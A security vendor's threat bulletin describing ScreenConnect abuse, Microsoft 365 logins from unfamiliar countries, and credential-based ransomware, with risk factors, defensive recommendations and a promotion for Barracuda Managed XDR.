Takeaways
- A rise in attackers trying to use ScreenConnect for unauthorised remote access
- Attackers using bought or stolen credentials for ransomware and data theft
- A rise in Microsoft 365 login attempts from unfamiliar countries
Attackers using ScreenConnect for unauthorised remote access
What’s happening?
The SOC team recently noticed a rise in the suspicious use of ScreenConnect. This includes attackers attempting to connect endpoints to targets’ ScreenConnect deployments, and attackers deploying ScreenConnect themselves to control hosts remotely.
ScreenConnect is a trusted and popular remote device management tool used by many organisations and their managed service providers. As a result, the detection of ScreenConnect does not immediately arouse suspicion.
Earlier in 2025, attackers discovered a serious weakness in older versions of ScreenConnect that could allow them break into systems and run harmful programs without permission. Hackers are using this vulnerability to take control of systems remotely, install ransomware, steal data, and to move through the network to other connected systems.
The successful breach of an existing deployment can give criminals access to many devices and even organisations.
ScreenConnect released a patch for the vulnerability on April 24, 2025.
Your organisation may be at risk if you are:
- Running older versions of ScreenConnect that haven’t been updated.
- Using unmanaged or unauthorised remote access tools.
- Lack multifactor authentication (MFA) for admin accounts.
- Have not yet applied the software patch to address the bug.
To protect your organisation:
- Implement a strong, multi-layered security solution such as Barracuda XDR Managed Endpoint Security that can spot and contain suspicious ScreenConnect activity.
- Ensure your ScreenConnect software is running the latest version (25.2.4 or newer).
- Check your logs for suspicious or unusual activity.
- Enable MFA for all accounts, especially administrator accounts.
- Block unknown remote access tools and closely monitor attempts to look up or connect to ScreenConnect web addresses.
A rise in Microsoft 365 login attempts from unfamiliar countries
What’s happening?
Barracuda’s SOC team has detected a significant rise in attempts to log into Microsoft 365 accounts from countries where the targets don’t operate – a clear red flag that attackers are trying to access accounts using stolen usernames and passwords.
If the attackers succeed in breaching the network, they can access emails and files and impersonate the legitimate account holder to launch convincing internal phishing attacks and move deeper into the network.
Your organisation may be at risk if you are:
- Not implement geo-blocking or location-based login rules.
- Allowing employees to use weak or reused passwords.
- Lack MFA or don’t enforce it consistently across the organisation.
- Not monitoring logins for unusual locations or times
- Lack of monitoring for unusual login patterns.
To protect your organisation:
- Enforce the use of complex, unique passwords, and consider password managers.
- Enable MFA everywhere – this is the single, most effective step you can take.
- Monitor login alerts.
- Implement conditional access policies that block logins originating from a restricted country/region.
- Train employees to spot phishing attempts and report them.
- Implement a strong, multi-layered security solution that can spot and block incidents at different stages of the attack chain.
Attackers using bought or stolen credentials for ransomware and data theft
What’s happening?
Cybercriminals are stealing or buying usernames and passwords (credentials) and using them to break into systems. Once inside, they launch ransomware attacks or steal sensitive data.
These attacks often look like normal activity because the hackers use genuine credentials. Barracuda Managed XDR’s SOC tools spot the clues left by attackers such as the unusual use of legitimate administrative tools (PsExec, PowerShell), multiple repeat or simultaneous login attempts or the unexpected creation of remote services.
Your organisation may be at risk if you are:
- Allowing employees to use weak or reused passwords.
- Lack MFA or don’t enforce it consistently across the organisation.
- Not monitoring unusual logins or the use of admin tools.
- Lack alerts for suspicious remote access or script execution.
To protect your organisation:
- Enforce the use of complex, unique passwords.
- Password policies that rotate credentials at regular intervals, for example every three months.
- Enable MFA everywhere, and especially for admin and remote access accounts.
- Monitor activity, looking for odd login times, the unexpected use of admin tools, or new remote services.
- Train employees to spot phishing attempts and report them.
- Implement a strong, multi-layered security solution that can spot and block incidents at different stages of the attack chain.
How Barracuda Managed XDR can help your organisation
Barracuda Managed XDR delivers advanced protection against the threats identified in this report by combining cutting-edge technology with expert SOC oversight. With real-time threat intelligence, automated responses, a 24/7/365 SOC team and
XDR Managed Vulnerability Security that identifies security gaps and oversights, Barracuda Managed XDR ensures comprehensive, proactive protection across your network, cloud, email, servers and endpoints, giving you the confidence to stay ahead of evolving threats.
